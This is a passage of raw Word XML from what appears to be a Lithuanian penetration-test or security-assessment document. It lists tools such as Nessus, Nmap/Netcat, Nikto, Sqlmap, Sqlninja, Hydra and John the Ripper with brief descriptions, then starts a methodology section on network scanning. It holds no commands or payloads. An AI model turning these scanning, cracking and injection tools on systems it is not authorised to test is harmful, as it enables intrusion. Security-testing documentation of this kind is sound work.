      <w:r w:rsidR="00265437" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jei bus reikalinga</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://draw.io</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA7AED3" w14:textId="48AA81E5" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1857E8" w14:textId="2BA7F588" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildom</w:t>
      </w:r>
      <w:r w:rsidR="000D0CB5" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="00220388" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> darbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> priemonės</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749186BD" w14:textId="77777777" w:rsidR="00220388" w:rsidRPr="00607DC0" w:rsidRDefault="00220388" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BE2182" w14:textId="65832E3B" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C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u w:val="single"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pavadinimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Trumpas apibūdinimas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285B61F5" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SING</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>įrankis, skirtas pakeisti įvairius ICMP paketo tipus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9BB2F" w14:textId="2536FCB1" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NESSUS</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> skeneris su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00003ED4" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>papildymais</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A1EE957" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>Įvairiapusis tinklo jungties, skenavimo įrankis UDP ir TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEAA4B1" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Whisker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tinklo skenavimo įrankis, parašytas PERL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABCFE55" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Sudėtingesnis tinklo skenavimo įrankis, pagrįstas </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Whisker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F75C93C" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fragrouter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>Paketas, pakeičiantis įrankį NIDS tikrinimui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B5F223" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nemesis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>Paketas, apipavidalinantis įrankį ugniasienių ir maršrutizatorių tikrinimui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331725EC" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Xprobe2</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>Įrankis, pirštų atspaudų sistemoms su ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A169638" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>John</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ripper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>Slaptažodžio nulaužimo įrankis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D1815" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> injekcijos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39719CCB" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sqlninja</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> injekcijos, užvaldymas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5698F64E" w14:textId="74472969" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Snmpwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>snmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> paketų medis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690C9E46" w14:textId="79E527E6" w:rsidR="00153DE5" w:rsidRPr="00607DC0" w:rsidRDefault="00153DE5" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00003ED4" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>brutalios jėgos (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00003ED4" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>brute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00003ED4" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00003ED4" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>foce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00003ED4" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) įrankis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249FD5BA" w14:textId="5B90ECE9" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DD83DB" w14:textId="77777777" w:rsidR="008553C8" w:rsidRPr="00607DC0" w:rsidRDefault="008553C8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EAB71B" w14:textId="0EC63265" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darbo atlikimo metodika</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F7AB9" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darbo metu atliekamas tinklo skenavimas, aptinkami paslaugų prievadai (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>servises</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
